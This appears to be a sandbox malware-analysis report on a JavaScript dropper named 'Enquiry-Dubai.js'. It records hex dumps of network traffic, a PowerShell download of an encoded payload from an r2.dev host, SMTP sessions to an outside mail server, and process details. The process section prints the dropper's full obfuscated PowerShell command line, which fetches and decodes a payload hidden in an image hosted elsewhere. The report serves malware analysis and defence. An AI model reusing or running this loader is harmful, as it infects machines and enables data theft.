                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: e2 43 9e e8 b9 a0 10 00 2e 67 ad 5e ae a7 4e ea ac 25 88 9b 90 12 40 a4 68 a1 00 fa a1 85 4e a3 69 89 05 bc 5a e7 1b 5c 48 57 0b 40 24 8d b0 01 55 5d 44 07 19 57 e2 34 1b 2d ce 97 64 20 51 08 14 0c 28 40 49 68 bc ff 00 2e 73 20 2b 8c 9b 63 05 92 7b 6e 8f db f2 5c f7 37 36 96 02 c1 11 6c 1e d1 65 67 8e e5 69 55 aa 77 5f 89 5b ab 6d 5e c5 11 88 4d b5 b4 c1 b5 49 26 00 7d f6 30 04 ec 91 80 f9 92 db 4c 10 be b4 6e c9 73 ae 25 18 b0 80 13 e0 3a 91 a6 4f 69 8f ea 2b 52 6d 2a f4 de 18 23 00 a1 be ea 61 66 06 e3 77 0b 57 12 5c dd f4 05 a2 9c 14 05 c8 65 07 42 b9 ce 23 70 e8 00 60 ed 98 89 50 89 95 18 75 91 38 1a 1f a8 26 38 19 43 ed 7c a6 e4 9d c0 c0 d9 31 f0 d1 73 53 88 4e dd b4 ef 53 01 e6 57 d8 82 e6 9f e7 53 b2 6a 20 21 a1 37 7e 66 15 36 de 79 6b 4b 93 5b ee
                                                                                      Data Ascii: C.g^N%@hNiZ\HW@$U]DW4-d Q(@Ih.s +c{n\76legiUw_[m^MI&}0Lns%:Oi+Rm*#afwW\eB#p`Pu8&8C|1sSNSWSj !7~f6ykK[
                                                                                      2025-03-23 20:48:55 UTC16384INData Raw: c4 05 0a 17 32 8e 4f d5 09 28 3a 17 03 76 ac 2b a5 6c 82 9c b0 fb 17 5e fb a0 8a 85 35 d7 27 d4 00 40 8f b2 74 22 e7 22 1b 3b 8a 64 a2 2e 5b 1e db bb 52 1c 8f ab bf 83 94 63 08 55 75 16 84 ca a6 9a 0e 8d 06 ca ef 40 33 19 c4 f2 16 e0 6c 82 c7 c1 ba d8 9d 5c 20 2d 8f 3e 07 c2 3d 46 fd d7 01 a4 08 a9 50 3d 8b 63 db 7d bb e8 3e b7 18 52 62 7c c6 fc f8 f1 fd 43 0e 7a 3a b6 3a 8d 4b 97 ea c3 ff 00 f2 1f 9d 53 a0 ad 4f a5 d2 7f b2 e3 f3 ba 1a fd 2b 19 cc 4a a6 c3 51 f5 a9 1a 35 3f 18 35 51 a1 71 e8 fa 08 58 68 73 c1 46 11 70 0a a5 5b 13 ba bb 10 78 6b 5d d5 4d 4e fc ae f5 24 ee a2 f0 1a c8 0d 60 2f 02 43 80 5d d0 bb 80 b9 c2 d7 5d eb 44 1b f8 35 1a e3 dc 6b 57 ee 69 83 4f a8 6b cb 5c 85 40 88 69 41 ba 11 72 fd b3 24 08 f1 2c 37 09 8f 2a fd 33 6a 8e b3 f4 f3 4c
                                                                                      Data Ascii: 2O(:v+l^5'@t"";d.[RcUu@3l\ ->=FP=c}>Rb|Cz::KSO+JQ5?5QqXhsFp[xk]MN$`/C]]D5kWiOk\@iAr$,7*3jL


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449723172.66.0.2354438188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-03-23 20:49:03 UTC100OUTGET /223.txt HTTP/1.1
                                                                                      Host: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                                                                                      Connection: Keep-Alive
                                                                                      2025-03-23 20:49:03 UTC285INHTTP/1.1 200 OK
                                                                                      Date: Sun, 23 Mar 2025 20:49:03 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 327680
                                                                                      Connection: close
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "212bd8b6f43f2ddb04096efd4b03a531"
                                                                                      Last-Modified: Sun, 23 Mar 2025 05:24:24 GMT
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 9250cb0b2aaa42bd-EWR
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 39 57 61 7a 4a 58 5a 32 42 53 65 30 6c 47 64 75 56 47 5a 4a 6c 48 62 69 31 57 5a 7a 4e 58 59 38 41 43 49 4b 30 67 50 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 57 52 33 63 6c 5a 57 61 75 46 57 62 67 49 53 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 35 78 6d 59 74 56 32 63 7a 46 47 50 4b 30 67 50 2f 49 79 63 6c 6c 6e 49 39 55 6d 62 76 78 57 59 6b 35 57 59 30 4e 48 49 69 67 54 4c 47 52 56 56 69 30 7a 5a 75 6c 47 5a 76 4e 6d 62 6c 42 69 49 77 34 53 4d 69 30 6a 62 76 6c 32 63 79 56 6d 64 67 77 57 62 34 39 44 50 2f 75 37 37 41 41 41 41 77 41 67 4c 41 41 44 41 75 41 41 4d 41 34 43 41 78 41 41 41 41 34 47 41 76 42 51 61 41 4d 48 41 79 42 51 5a
                                                                                      Data Ascii: 9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiAjLxISPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHI5xmYtV2czFGPK0gP/IycllnI9UmbvxWYk5WY0NHIigTLGRVVi0zZulGZvNmblBiIw4SMi0jbvl2cyVmdgwWb49DP/u77AAAAwAgLAADAuAAMA4CAxAAAA4GAvBQaAMHAyBQZ
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 45 42 55 7a 67 53 55 42 43 78 4d 6f 45 41 41 53 42 74 4d 6f 45 41 41 53 42 64 4d 6f 45 52 4a 52 41 43 41 43 43 56 4d 6f 45 56 4d 6f 45 42 49 41 49 4a 67 41 30 42 4b 52 41 68 44 59 45 56 55 58 45 31 46 52 4b 44 4b 52 4a 44 4b 42 30 42 4b 52 49 44 4b 52 48 44 4b 52 42 64 6b 68 45 5a 4d 6f 45 56 4d 6f 45 56 4d 6f 45 4f 63 77 4b 39 4c 6f 45 42 43 6f 45 52 4a 52 41 44 41 79 43 74 4c 59 45 52 4d 59 45 52 4d 59 45 42 4d 41 49 4d 6f 51 2b 43 4b 52 41 43 41 79 42 35 4c 6f 45 47 51 51 39 43 4b 52 48 41 41 69 42 4e 4d 6f 45 42 4d 6f 45 42 41 41 43 46 43 6f 45 41 41 51 42 49 67 51 41 43 41 53 42 46 4d 59 45 41 41 53 42 4a 4d 6f 45 41 41 51 42 49 55 77 67 52 55 77 67 52 55 77 67 52 55 77 67 52 6b 68 45 5a 49 52 41 44 4b 52 2f 43 4b 52 67 41 4b 52 2b 43 4b 52 39 43 4b
                                                                                      Data Ascii: EBUzgSUBCxMoEAASBtMoEAASBdMoERJRACACCVMoEVMoEBIAIJgA0BKRAhDYEVUXE1FRKDKRJDKB0BKRIDKRHDKRBdkhEZMoEVMoEVMoEOcwK9LoEBCoERJRADAyCtLYERMYERMYEBMAIMoQ+CKRACAyB5LoEGQQ9CKRHAAiBNMoEBMoEBAACFCoEAAQBIgQACASBFMYEAASBJMoEAAQBIUwgRUwgRUwgRUwgRkhEZIRADKR/CKRgAKR+CKR9CK
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 46 30 52 46 43 4b 52 42 64 34 77 42 48 38 41 43 56 49 6f 45 52 48 6f 45 46 30 52 46 43 4b 52 4e 43 4b 52 47 43 4b 52 42 64 67 77 42 57 77 68 41 42 41 43 42 41 47 6f 45 42 45 4f 67 52 55 42 43 63 34 51 48 53 49 41 49 47 67 41 67 42 4b 52 41 68 44 59 45 56 67 51 42 64 67 51 42 64 67 51 42 64 77 58 67 52 41 59 67 53 55 51 42 46 30 68 45 64 49 78 44 48 45 43 43 38 46 59 45 41 47 6f 45 41 47 6f 45 41 47 6f 45 41 47 6f 45 64 41 59 67 53 30 42 67 42 4b 52 48 41 47 6f 45 49 55 51 48 49 41 59 67 53 30 77 42 6c 67 51 42 64 49 77 42 46 67 51 67 43 4b 68 41 48 59 41 43 39 4a 6f 45 43 63 67 42 4f 45 51 5a 42 4b 52 46 4f 34 67 41 41 6f 41 43 35 4a 52 2b 42 4b 68 44 64 30 61 67 53 34 51 41 4e 4a 52 46 47 63 67 45 49 67 67 44 64 34 51 41 4e 4a 52 46 4f 67 67 44 4f 34 51
                                                                                      Data Ascii: F0RFCKRBd4wBH8ACVIoERHoEF0RFCKRNCKRGCKRBdgwBWwhABACBAGoEBEOgRUBCc4QHSIAIGgAgBKRAhDYEVgQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQgCKhAHYAC9JoECcgBOEQZBKRFO4gAAoAC5JR+BKhDd0agS4QANJRFGcgEIggDd4QANJRFOggDO4Q
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 34 51 41 4e 4a 52 46 4f 45 51 54 53 55 78 43 48 51 43 43 4f 45 51 34 41 47 52 46 41 46 6f 45 4f 34 51 41 4e 4a 52 46 41 46 6f 45 42 30 6b 45 56 59 77 42 5a 49 41 47 42 49 41 49 46 67 41 43 49 49 41 41 46 67 41 43 4f 30 42 43 4f 55 51 48 49 67 41 51 42 4b 42 43 49 55 51 48 46 30 42 4b 42 4b 68 44 6c 47 6f 45 59 34 41 51 42 4b 52 41 4e 4a 52 46 54 63 51 4a 44 34 51 41 41 51 41 43 44 30 78 41 64 67 67 44 64 4d 51 48 41 46 6f 45 4f 34 67 44 4f 34 67 44 64 34 67 44 41 46 6f 45 42 30 6b 45 56 41 78 42 66 67 67 44 49 34 41 43 46 30 52 42 64 34 41 43 48 77 41 43 4f 34 67 41 64 4a 52 46 4f 49 51 77 42 47 52 46 41 46 6f 45 4f 41 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 48 63 67 48 49 41 55 67 53 45 51 54 53 55 42 51 42 4b 68 44 4f 34 41 43 49 34 67 44 41 46 6f 45
                                                                                      Data Ascii: 4QANJRFOEQTSUxCHQCCOEQ4AGRFAFoEO4QANJRFAFoEB0kEVYwBZIAGBIAIFgACIIAAFgACO0BCOUQHIgAQBKBCIUQHF0BKBKhDlGoEY4AQBKRANJRFTcQJD4QAAQACD0xAdggDdMQHAFoEO4gDO4gDd4gDAFoEB0kEVAxBfggDI4ACF0RBd4ACHwACO4gAdJRFOIQwBGRFAFoEOAVgS4AQBKRANJRFHcgHIAUgSEQTSUBQBKhDO4ACI4gDAFoE
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 51 49 43 4b 68 44 4f 34 67 44 42 30 6b 45 56 34 67 44 42 30 6b 45 56 34 51 41 4e 4a 52 46 4f 34 67 44 4f 41 55 67 53 45 51 54 53 55 52 49 48 67 46 43 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 67 44 63 67 52 2b 41 4b 42 48 35 44 6f 45 59 67 52 2b 41 4b 42 47 35 44 6f 45 68 45 52 2b 41 4b 42 47 63 67 41 47 59 67 41 47 68 45 42 48 49 67 42 43 59 67 51 57 53 67 41 43 70 46 6f 45 4f 34 51 70 42 4b 68 44 6c 47 6f 45 41 46 6f 45 42 30 6b 45 56 73 79 42 50 68 41 43 46 47 6f 45 49 55 59 67 53 45 51 42 41 77 41 43 44 30 52 42 64 34 41 42 48 67 51 57 53 6b 6c 45 43 49 41 41 48 67 77 41 64 4d 51 48 49 34 51 48 4f 30 42 43 4f 30 42 43 4f 30 42 43 6c 47 6f 45 64 55 61 67 53 30 68 44 4f 34 51 48 41 46 6f 45 4f 55 61 67 53 34 51 70 42 4b 68 44 6c 47 6f 45 5a
                                                                                      Data Ascii: QICKhDO4gDB0kEV4gDB0kEV4QANJRFO4gDOAUgSEQTSURIHgFCI4QHAFoEB0kEVAUgS4gDcgR+AKBH5DoEYgR+AKBG5DoEhER+AKBGcgAGYgAGhEBHIgBCYgQWSgACpFoEO4QpBKhDlGoEAFoEB0kEVsyBPhACFGoEIUYgSEQBAwACD0RBd4ABHgQWSklECIAAHgwAdMQHI4QHO0BCO0BCO0BClGoEdUagS0hDO4QHAFoEOUagS4QpBKhDlGoEZ
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 50 63 77 4a 49 34 67 41 48 51 41 43 49 34 51 48 4f 34 67 44 64 59 77 42 4b 67 41 43 4f 30 68 44 4f 34 51 48 4f 34 41 43 48 77 51 42 42 6f 77 41 43 34 51 70 42 4b 68 41 67 63 41 43 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 51 42 64 55 51 48 4f 55 61 67 53 34 67 44 64 55 61 67 53 41 55 67 53 45 51 54 53 55 68 44 48 59 43 43 49 34 51 48 49 34 51 48 4f 30 68 44 4f 34 51 41 4e 4a 52 46 4f 30 68 43 48 51 42 43 4f 55 67 41 41 55 41 43 49 67 67 44 45 63 67 42 4f 30 66 67 53 45 41 49 47 6b 66 67 53 41 41 49 46 67 51 39 42 4b 52 41 67 59 51 38 42 4b 42 41 67 55 41 43 35 4a 52 2b 42 4b 42 43 4f 30 42 51 42 4b 52 39 42 4b 52 38 42 4b 52 37 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 73 77 42 66 67 41 43 4f 30 78 41 64 34
                                                                                      Data Ascii: gS4AQBKRANJRFPcwJI4gAHQACI4QHO4gDdYwBKgACO0hDO4QHO4ACHwQBBowAC4QpBKhAgcACI4QHAFoEB0kEVAUgS4QBdUQHOUagS4gDdUagSAUgSEQTSUhDHYCCI4QHI4QHO0hDO4QANJRFO0hCHQBCOUgAAUACIggDEcgBO0fgSEAIGkfgSAAIFgQ9BKRAgYQ8BKBAgUAC5JR+BKBCO0BQBKR9BKR8BKR7BKhDAFoEB0kEVswBfgACO0xAd4
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 4f 34 51 48 44 41 51 43 78 46 59 45 4f 45 41 41 47 67 41 43 4f 30 42 51 42 4b 52 41 4e 4a 52 46 4f 34 67 44 48 63 41 45 41 4d 52 41 54 45 41 49 47 41 77 45 43 45 41 49 46 6b 6c 45 49 45 41 41 46 45 77 45 41 4d 52 41 43 41 79 42 4f 45 53 45 43 30 6c 45 56 63 51 61 42 4b 42 41 67 55 51 62 42 4b 42 41 41 55 41 43 59 41 55 67 53 45 51 54 53 55 68 44 68 45 68 41 64 4a 52 46 41 46 6f 45 4f 34 67 44 59 6b 50 67 53 77 52 2b 41 4b 42 47 59 6b 50 67 53 67 52 2b 41 4b 52 49 52 6b 50 67 53 67 42 48 49 67 42 47 49 67 52 49 52 77 42 43 4f 45 53 45 43 30 6c 45 56 67 42 43 59 67 51 57 53 67 41 43 70 46 6f 45 41 46 6f 45 42 30 6b 45 56 63 79 42 53 42 77 45 42 55 57 67 53 55 52 41 42 41 69 43 49 46 6f 45 42 45 4f 67 52 55 42 43 49 46 6f 45 42 30 6b 45 56 63 41 43 49 46 6f
                                                                                      Data Ascii: O4QHDAQCxFYEOEAAGgACO0BQBKRANJRFO4gDHcAEAMRATEAIGAwECEAIFklEIEAAFEwEAMRACAyBOESEC0lEVcQaBKBAgUQbBKBAAUACYAUgSEQTSUhDhEhAdJRFAFoEO4gDYkPgSwR+AKBGYkPgSgR+AKRIRkPgSgBHIgBGIgRIRwBCOESEC0lEVgBCYgQWSgACpFoEAFoEB0kEVcyBSBwEBUWgSURABAiCIFoEBEOgRUBCIFoEB0kEVcACIFo
                                                                                      2025-03-23 20:49:03 UTC1369INData Raw: 59 41 42 45 4a 59 45 47 51 41 51 43 47 68 42 45 77 6a 67 52 59 41 42 34 49 59 45 47 51 41 43 4f 67 67 41 64 4a 52 46 42 41 51 43 4f 67 67 41 64 4a 52 46 4f 67 67 41 64 4a 52 46 42 41 67 44 4f 34 67 41 64 4a 52 46 41 41 41 43 4f 30 68 44 34 48 59 45 43 41 41 43 59 51 68 67 52 45 41 41 47 6f 41 45 59 49 67 41 41 59 41 47 4a 41 52 43 59 67 68 41 46 41 51 43 59 6b 51 43 59 6b 51 43 4f 67 78 42 41 6f 51 43 4a 6b 41 45 43 47 42 47 59 55 41 41 4b 51 52 41 4f 6b 51 43 4d 49 59 45 59 67 42 47 47 41 77 43 4a 30 68 45 4f 6b 77 41 41 63 41 49 43 47 68 41 4a 67 42 45 59 67 42 47 43 63 41 41 4e 6b 67 41 63 49 59 45 59 4d 41 41 49 67 41 45 49 67 42 4a 43 47 42 43 43 47 42 42 41 77 41 43 51 67 41 47 59 49 59 45 59 67 67 67 52 55 41 41 4e 41 41 41 41 30 43 42 41 41 41 41
                                                                                      Data Ascii: YABEJYEGQAQCGhBEwjgRYAB4IYEGQACOggAdJRFBAQCOggAdJRFOggAdJRFBAgDO4gAdJRFAAACO0hD4HYECAACYQhgREAAGoAEYIgAAYAGJARCYghAFAQCYkQCYkQCOgxBAoQCJkAECGBGYUAAKQRAOkQCMIYEYgBGGAwCJ0hEOkwAAcAICGhAJgBEYgBGCcAANkgAcIYEYMAAIgAEIgBJCGBCCGBBAwACQgAGYIYEYgggRUAANAAAA0CBAAAA


                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Mar 23, 2025 21:49:06.609875917 CET58749725161.97.124.96192.168.2.4220-ss5103.hostingcare.net ESMTP Exim 4.98.1 #2 Sun, 23 Mar 2025 21:49:06 +0100
                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                      220 and/or bulk e-mail.
                                                                                      Mar 23, 2025 21:49:06.610153913 CET49725587192.168.2.4161.97.124.96EHLO 114127
                                                                                      Mar 23, 2025 21:49:06.795133114 CET58749725161.97.124.96192.168.2.4250-ss5103.hostingcare.net Hello 114127 [161.77.13.2]
                                                                                      250-SIZE 52428800
                                                                                      250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                      250-8BITMIME
                                                                                      250-PIPELINING
                                                                                      250-PIPECONNECT
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-STARTTLS
                                                                                      250 HELP
                                                                                      Mar 23, 2025 21:49:06.795449018 CET49725587192.168.2.4161.97.124.96STARTTLS
                                                                                      Mar 23, 2025 21:49:06.981169939 CET58749725161.97.124.96192.168.2.4220 TLS go ahead
                                                                                      Mar 23, 2025 21:49:09.426950932 CET58749726161.97.124.96192.168.2.4220-ss5103.hostingcare.net ESMTP Exim 4.98.1 #2 Sun, 23 Mar 2025 21:49:09 +0100
                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                      220 and/or bulk e-mail.
                                                                                      Mar 23, 2025 21:49:09.427094936 CET49726587192.168.2.4161.97.124.96EHLO 114127
                                                                                      Mar 23, 2025 21:49:09.607383966 CET58749726161.97.124.96192.168.2.4250-ss5103.hostingcare.net Hello 114127 [161.77.13.2]
                                                                                      250-SIZE 52428800
                                                                                      250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                      250-8BITMIME
                                                                                      250-PIPELINING
                                                                                      250-PIPECONNECT
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-STARTTLS
                                                                                      250 HELP
                                                                                      Mar 23, 2025 21:49:09.607556105 CET49726587192.168.2.4161.97.124.96STARTTLS
                                                                                      Mar 23, 2025 21:49:09.788827896 CET58749726161.97.124.96192.168.2.4220 TLS go ahead

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      • File
                                                                                      • Registry
                                                                                      • Network

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:16:48:40
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js"
                                                                                      Imagebase:0x7ff620160000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      Show Windows behavior

                                                                                      Registry Activities

                                                                                      Show Windows behavior

                                                                                      COM Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Windows UI Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:16:48:51
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshackscwBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshackscslanshacksBhslanshacksHIslanshacksdslanshacksBpslanshacksGMslanshacksaQBwslanshacksGEslanshacksbgBjslanshacksHkslanshacksLgBEslanshacksG8slanshacksdwBuslanshacksGwslanshacksbwBhslanshacksGQslanshacksRslanshacksBhslanshacksHQslanshacksYQslanshacksoslanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCkslanshacksOwslanshackskslanshacksHIslanshacksYQBkslanshacksGkslanshacksbwBzslanshacksHkslanshacksbQBtslanshacksGUslanshacksdslanshacksByslanshacksHkslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksWwBTslanshacksHkslanshackscwB0slanshacksGUslanshacksbQslanshacksuslanshacksFQslanshacksZQB4slanshacksHQslanshacksLgBFslanshacksG4slanshacksYwBvslanshacksGQslanshacksaQBuslanshacksGcslanshacksXQslanshacks6slanshacksDoslanshacksVQBUslanshacksEYslanshacksOslanshacksslanshacksuslanshacksEcslanshacksZQB0slanshacksFMslanshacksdslanshacksByslanshacksGkslanshacksbgBnslanshacksCgslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshackscwBlslanshacksCkslanshacksOwslanshackskslanshacksGMslanshackseQB0slanshacksG8slanshacksbQBlslanshacksHQslanshacksZQByslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksPslanshacksslanshacks8slanshacksEIslanshacksQQBTslanshacksEUslanshacksNgslanshacks0slanshacksF8slanshacksUwBUslanshacksEEslanshacksUgBUslanshacksD4slanshacksPgslanshacksnslanshacksDsslanshacksJslanshacksB0slanshacksHYslanshacksaQB4slanshacksGIs